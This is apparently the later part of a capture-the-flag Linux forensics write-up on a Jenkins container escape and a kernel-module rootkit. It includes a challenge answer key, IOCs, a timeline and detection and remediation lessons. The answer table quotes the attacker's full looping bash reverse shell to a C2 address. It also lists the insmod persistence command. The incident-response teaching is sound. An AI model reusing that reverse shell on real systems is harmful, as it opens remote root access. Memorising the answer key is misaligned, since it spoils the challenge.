| 5 | dmesg timestamp of rootkit load | 9127.292300 |
| 6 | Absolute UTC timestamp of rootkit load | 2025-11-24 23:31 |
| 7 | C2 IP and port | 185.220.101.50:9999 |
| 8 | Systemd service file path | /etc/systemd/system/sysperf.service |
| 9 | ExecStart command | /sbin/insmod /lib/modules/sysperf.ko |
| 10 | PID of reverse shell loop | 39303 |
| 11 | Full reverse shell command | while true; do bash -i >& /dev/tcp/185.220.101.50/9999 0>&1; sleep 30; done |
| 12 | SHA256 of rootkit module | ded20890c28460708ea1f02ef50b6e3b44948dbe67d590cc6ff2285241353fd8 |
Indicators of Compromise
| Type | Value | Description |
|---|---|---|
| IP:Port | `185.220.101.50:9999` | C2 server. Root-level persistent reverse shell destination. |
| IP:Port | `185.220.101.50:4444` | C2 server. Initial container reverse shell destination. |
| SHA256 | `ded20890c28460708ea1f02ef50b6e3b44948dbe67d590cc6ff2285241353fd8` | `sysperf.ko` rootkit kernel module. |
| File | `/lib/modules/sysperf.ko` | Rootkit module binary. Non-standard location. |
| File | `/etc/systemd/system/sysperf.service` | Persistence service. Reloads rootkit on every boot. |
| Module Name | `sysperf` / `SysPerfMon` | Kernel module name and display name used by the rootkit. |
| Kernel Taint | `12288` | Kernel taint value indicating an out-of-tree, proprietary module was loaded. |
Chronological Timeline
| Timestamp (UTC) | Event | Artifact Source |
|---|---|---|
| 2025-11-21 23:05 | First system boot | `utmpdump_var_log_wtmp.txt` |
| 2025-11-21 23:15 | System rebooted. Second boot begins. | `utmpdump_var_log_wtmp.txt` |
| 2025-11-21 23:15:53 | Kernel `5.4.0-216-generic` starts. Boot index 0 begins. | `journalctl --list-boots` |
| 2025-11-24 23:14 | SSH session from 192.168.192.1 as `natsuiro_xcn` | `utmpdump_var_log_wtmp.txt` |
| 2025-11-24 23:15 | Attacker escalates to root via `sudo su` | `ps_auxwwwf.txt` (PID 24844, 24859, 24860) |
| 2025-11-24 23:16 | Container reverse shell established to `185.220.101.50:4444` | `ps_auxwwwf.txt` (PID 24903) |
| 2025-11-24 23:31:36 | Rootkit `sysperf` loaded into kernel | `kern.log`, `modules_tainting_the_kernel_dmesg.txt` |
| 2025-11-24 23:31:36 | Kernel tainted (value 12288) | `cat_proc_sys_kernel_tainted.txt` |
| 2025-11-24 23:31:36 | C2 address logged: `185.220.101.50:9999` | `kern.log` |
| 2025-11-24 23:31 | `sysperf.service` created for boot persistence | `sysperf.service` (ctime) |
| 2025-11-24 23:31 | Root reverse shell loop started (PID 39303) | `ps_auxwwwf.txt` |
| 2025-11-24 23:36:52 | UAC forensic collection performed | `journalctl --list-boots`, `uac.log` |
Key Investigation Lessons
1. Cross-Reference Multiple Sources
A rootkit filters live system output. Never rely on a single source.
- `/sys/module/` vs `lsmod`: for hidden kernel modules.
- `kern.log` vs dmesg offset: for event timestamps.
- `ps` output vs the process directory: for hidden processes.
- The `[root]` filesystem vs `live_response`: for modified configuration files.
2. Check kern.log Before Calculating from dmesg
The dmesg offset requires knowing which boot the event occurred in and the exact boot start time. kern.log provides the same information as a direct wall-clock timestamp.
Always check kern.log first. Use the dmesg calculation only when kern.log has been deleted or tampered with.
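When the offset calculation is unavoidable, the arithmetic with GNU `date` looks like the sketch below. The boot-start value here is a placeholder derived by working backwards from the known answer; in a real case, take it from `journalctl --list-boots` for the correct boot:

```shell
# Wall-clock time = boot start (epoch seconds) + dmesg seconds-since-boot offset.
BOOT_START='2025-11-24 20:59:29'   # placeholder; read the real value from journalctl --list-boots
OFFSET=9127                        # dmesg [seconds.micro] timestamp, truncated to whole seconds
BOOT_EPOCH=$(date -u -d "$BOOT_START" +%s)
date -u -d "@$((BOOT_EPOCH + OFFSET))" '+%Y-%m-%d %H:%M UTC'
```

This requires GNU `date` (Linux); BSD/macOS `date` uses different flags. Note also that dmesg timestamps can drift from wall-clock time (e.g. across suspend), which is one more reason to prefer `kern.log`.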
3. Rootkits Sometimes Log Their Own Activity
The sysperf rootkit logged its C2 address to kern.log on load. Always read kernel log messages from the time a suspicious module loaded. The module initialization function may print diagnostic information that the attacker forgot to clean up.
4. Persistence Is Always Layered
The attacker used two persistence mechanisms: the systemd service (survives reboots) and the reverse shell loop (survives connection drops). Remediation must address both. Removing the rootkit from memory without removing the service file means it returns on the next reboot.
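A remediation checklist covering both layers might look like the dry-run sketch below. The `run` wrapper only echoes each step; the service name, module path, and PID come from this investigation, and evidence should be preserved before any of it is executed for real:

```shell
# Dry-run remediation: each step is printed, not executed.
run() { echo "+ $*"; }                         # swap the body for "$@" to actually execute
run systemctl disable --now sysperf.service    # stop the boot persistence layer
run rm -f /etc/systemd/system/sysperf.service
run systemctl daemon-reload
run kill -9 39303                              # terminate the reverse shell loop
run rmmod sysperf                              # may fail if the rootkit resists unload; reboot then
run rm -f /lib/modules/sysperf.ko              # remove the module binary itself
```

The ordering matters: disabling the service before killing the loop prevents systemd from respawning anything, and the module file is removed last so the hash can still be collected.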
5. The /sys/module vs lsmod Technique Is Reliable
This is the primary live detection technique for hidden LKM rootkits. It works because /sys/module/ is a filesystem and the rootkit typically only removes its linked list entry, not the /sys/module/ directory.
This technique works on forensic collections and on live systems. It does not require memory forensics tools.
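The comparison itself is a single `comm` invocation over two sorted name lists. A self-contained sketch with fabricated data (on a live system the inputs would be `lsmod | awk 'NR>1{print $1}' | sort` and `ls /sys/module | sort`):

```shell
# Fabricated data: the rootkit hides "sysperf" from lsmod output,
# but its /sys/module directory entry remains.
printf 'ext4\noverlay\n' | sort > /tmp/lsmod_names.txt
printf 'ext4\noverlay\nsysperf\n' | sort > /tmp/sysfs_names.txt
# Lines unique to the second file = modules visible in sysfs but absent from lsmod.
comm -13 /tmp/lsmod_names.txt /tmp/sysfs_names.txt
```

On a real system expect some benign differences: built-in kernel code with parameters also gets a `/sys/module/` entry without appearing in `lsmod`. Treat the diff as a lead to investigate, not proof by itself.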
6. The Golden Period
The time between the container escape and rootkit load is forensically valuable. The attacker had root but no rootkit filtering. Log entries from this window are trustworthy. Always identify this window and examine its logs first.
7. Jenkins Misconfigurations Are a Common Entry Point
CSRF protection disabled and setup wizard skipped are both deliberate configuration choices. In real environments, verify Jenkins configuration files for these flags. Both should be absent in a production deployment.
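As a quick triage, the CSRF flag can be checked in the Jenkins home. The sketch below fabricates a minimal `config.xml` to stay self-contained; `crumbIssuer` is the element Jenkins writes when CSRF protection is enabled, so its absence is a red flag, though this is a heuristic rather than proof. (The skipped setup wizard shows up elsewhere, as a `-Djenkins.install.runSetupWizard=false` JVM property in the service configuration.)

```shell
JENKINS_HOME=/tmp/jenkins_demo        # point at the real Jenkins home in practice
mkdir -p "$JENKINS_HOME"
cat > "$JENKINS_HOME/config.xml" <<'EOF'
<?xml version='1.1' encoding='UTF-8'?>
<hudson>
  <installStateName>RUNNING</installStateName>
</hudson>
EOF
# CSRF protection writes a <crumbIssuer> element into config.xml.
grep -q '<crumbIssuer' "$JENKINS_HOME/config.xml" \
  || echo 'WARNING: no crumbIssuer element -- CSRF protection may be disabled'
```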
What This Document Does Not Cover
Adjacent Techniques You Should Know Exist
- eBPF Rootkits: Malicious programs loaded via the `bpf()` syscall. They do not require a kernel module, so the standard `lsmod` vs `/sys/module/` detection will miss them. Use `bpftool` to enumerate loaded eBPF programs.
- Ftrace Hooking: Uses the kernel’s built-in function tracing framework to intercept kernel functions without modifying the syscall table. More stealthy than syscall table hooking on modern kernels with write protection enabled.
- Userland Rootkits: Operate in userspace by replacing system binaries or using `LD_PRELOAD` injection. They do not require kernel access and are detected differently from LKM rootkits.
- Memory Forensics with Volatility: This investigation used static artifact analysis. A full memory dump analyzed with Volatility would have provided direct evidence of hooked syscalls, hidden process task structures, and the rootkit code itself in memory. That analysis is not performed here.
- Container Overlay Filesystem Analysis: The attacker staged tools inside the Jenkins container before the escape. The container overlay layers at `/var/lib/docker/overlay2/` were not analyzed in this write-up. Those layers may contain exploit binaries and tools used during the intrusion.
- Network Capture Analysis: A pcap file was present in the collection (referenced in `ps_auxwwwf.txt` via `tcpdump`). Analysis of network traffic would provide additional evidence of attacker communication patterns.
- Kernel Exploit Identification: The exact container escape exploit was not confirmed. A deeper investigation would involve analyzing kernel error messages, container capability configuration, and the deleted executable at `/proc/11324/exe`.
Why These Are Not in This Document
This document covers the artifacts and techniques needed to answer the 12 CTF questions plus the container escape analysis visible in the process tree. The adjacent topics above require additional tools or evidence sources not available in the collection provided.
Where to Go Next
- Volatility Foundation (volatilityfoundation.org): Linux memory forensics plugins for rootkit detection and syscall hook analysis.
- MITRE ATT&CK T1014 sub-techniques: Full taxonomy of rootkit types and detection methods.
- bpftool documentation: Detection of eBPF-based rootkits.
- Sandfly Security blog (sandflysecurity.com): Practical LKM rootkit detection techniques that do not rely on compromised system tools.
- SANS FOR577: Linux and Mac memory forensics and rootkit analysis course.
- UAC project (github.com/tclahr/uac): Documentation for the collection tool used in this challenge.